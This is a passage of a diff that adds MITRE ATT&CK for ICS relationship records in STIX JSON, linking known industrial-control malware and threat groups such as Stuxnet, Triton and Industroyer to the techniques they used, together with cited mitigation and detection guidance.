"relationship", + "id": "relationship--3d4ea0e2-9f51-40f9-a22b-8265f696fd83", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:19:04.853Z", + "description": "Monitor logon activity for unexpected or unusual access to devices from the Internet.", + "relationship_type": "detects", + "source_ref": 
"x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "target_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bc74ff8f-d5fa-40fb-8c0b-f16af3ff36e3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Apply DLP to protect the confidentiality of information related to operational processes, facility locations, device configurations, programs, or databases that may have information that can be used to infer organizational trade-secrets, recipes, and other intellectual property (IP).\n", + "source_ref": "course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--107d9a23-991b-44f5-97f6-7f6983c7013a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.099Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + 
"x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7258c355-677c-452d-b1fc-27767232437b", + "created": "2019-03-26T16:19:52.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "David Voreacos, Katherine Chinglinsky, Riley Griffin December 2019", + "description": "David Voreacos, Katherine Chinglinsky, Riley Griffin 2019, December 03 Merck Cyberattacks $1.3 Billion Question: Was It an Act of War? Retrieved. 2019/12/06 ", + "url": "https://www.bloomberg.com/news/features/2019-12-03/merck-cyberattack-s-1-3-billion-question-was-it-an-act-of-war" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:59:02.909Z", + "description": "[NotPetya](https://attack.mitre.org/software/S0368) disrupted manufacturing facilities supplying vaccines, resulting in a halt of production and the inability to meet demand for specific vaccines. (Citation: David Voreacos, Katherine Chinglinsky, Riley Griffin December 2019)", + "relationship_type": "uses", + "source_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d8911566-f622-4a01-b765-514dbbfd8201", + "created": "2022-09-28T20:27:01.345Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. 
Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.447Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can deploy Tcpdump to sniff network traffic and collect PCAP files.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--92634d06-42e5-407f-bcb7-cafb1ddeafce", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:06:08.814Z", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) used valid credentials when laterally moving through RDP jump boxes into the ICS environment. 
(Citation: Dragos December 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3c341d13-938e-4535-ac75-10a79abc7017", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:46:17.575Z", + "description": "Monitor for application logging, messaging, and/or other artifacts that may rely upon specific actions by a user in order to gain execution.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--97c5b388-518a-46ec-b2b0-41bfa6a83204", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.115Z", + "relationship_type": "mitigates", + "description": "Update software regularly by employing patch management for internal enterprise endpoints and servers.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--53a54e4a-2b38-4b0c-8f60-252a68767443", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:12:58.883Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) modifies the Import Address Tables DLLs to hook specific APIs that are used to open project files. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--afd63145-6033-49e4-ad43-d0b35fa5ed88", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.061Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": 
"attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ca3c4d4b-cf53-4489-904f-8a220e421aeb", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T19:58:55.128Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604)'s OPC module can brute force values and will send out a 0x01 status which for the target systems equates to a Primary Variable Out of Limits misdirecting operators from understanding protective relay status. 
(Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--10e3816e-8ee2-4dcf-81b7-a22ec0b6fda5", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA October 2020", + "description": "UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA 2020, October 15 Indictment: Conspiracy to Commit an Offense Against the United States Retrieved. 2021/04/07 ", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:53:50.448Z", + "description": "In the Ukraine 2015 incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) sent spearphishing attachments to three energy distribution companies containing malware to gain access to victim systems. 
(Citation: UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA October 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7bd6e5e4-6614-41ed-8a84-8eb633a91e07", + "created": "2023-03-31T17:45:32.860Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T16:12:03.917Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) utilized VBS and batch scripts for file movement and as wrappers for PowerShell execution.(Citation: Dragos Crashoverride 2018)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--aaacfa83-033f-4555-ba6b-ecc7692a25aa", + "created": "2023-03-30T19:03:59.066Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + 
], + "modified": "2023-03-30T19:03:59.066Z", + "description": "Monitor executed commands and arguments that may search and collect local system sources, such as file systems or local databases, to find files of interest and sensitive data. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c1154a56-6f5f-4760-8b34-79b0e8a79c1f", + "created": "2023-03-10T20:34:55.362Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 
2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:34:55.362Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary suppressed alarm reporting to the central computer.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--dc46ffc2-eac7-4491-8d2a-46cf8e2e963f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Filter for protocols and payloads associated with firmware activation or updating activity.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4256a0c2-437d-4a4c-88ac-d08d3041b8c1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.178Z", + "relationship_type": 
"mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0b7f643e-8975-4998-acbb-7405fa944a68", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:54:38.303Z", + "description": "Monitor executed commands and arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Also monitor executed commands and arguments that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f8abf6f-0dd0-4449-b555-733fe7296177", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:24:19.351Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) leveraged the TriStation protocol to download programs onto Triconex Safety Instrumented System. 
(Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0ffdee1a-1e83-4506-aba2-38c55812abb3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.137Z", + "relationship_type": "mitigates", + "description": "Ensure that all SIS are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.\n", + "source_ref": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848", + "target_ref": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7c3b65e8-e8b7-4c3b-b27b-e216986d8976", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 
2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:26:34.069Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) toggles breakers to the open state utilizing unauthorized command messages. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6833d534-9cbb-4b9f-85b6-93d3d2d6faca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.202Z", + "relationship_type": "mitigates", + "description": "Ensure proper process and file permissions are in place to inhibit adversaries from disabling or interfering with critical services.\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--46bc86e4-e20b-4778-80d2-8891039e6fb4", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Hydro", + "description": "Hydro Kevin Beaumont How Lockergoga took down Hydro ransomware used in 
targeted attacks aimed at big business Retrieved. 2019/10/16 Retrieved. 2019/10/16 ", + "url": "https://www.hydro.com/en/media/on-the-agenda/cyber-attack/" + }, + { + "source_name": "Kevin Beaumont", + "description": "Kevin Beaumont How Lockergoga took down Hydro ransomware used in targeted attacks aimed at big business Retrieved. 2019/10/16 ", + "url": "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:56:30.836Z", + "description": "While Norsk Hydro attempted to recover from a [LockerGoga](https://attack.mitre.org/software/S0372) infection, most of its 160 manufacturing locations switched to manual (non-IT driven) operations. Manual operations can result in a loss of productivity. (Citation: Kevin Beaumont)(Citation: Hydro)", + "relationship_type": "uses", + "source_ref": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a08d85dd-a8b3-4848-94aa-941c43b6d8f2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.069Z", + "relationship_type": "mitigates", + "description": "Prevent unauthorized systems from accessing control servers or field devices containing industrial information, especially services used for common automation protocols (e.g., DNP3, OPC).\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": 
"attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--87eb5825-c918-444f-8da5-67da9eea9906", + "created": "2022-09-26T17:14:52.427Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:14:52.427Z", + "description": "Monitor device application logs for firmware changes, although not all devices will produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8fa6fe89-e704-4be4-a15b-50e188084aa3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.120Z", + "relationship_type": "mitigates", + "description": "Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist. 
(Citation: Dan Goodin March 2017)\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "external_references": [ + { + "source_name": "Dan Goodin March 2017", + "description": "Dan Goodin 2017, March Virtual machine escape fetches $105,000 at Pwn2Own hacking contest Retrieved. 2020/09/25 ", + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--75a60046-c4d7-498a-b256-9a93b5992dcc", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:55:46.014Z", + "description": "Monitor for unusual processes with internal network connections creating files on-system which may be suspicious. 
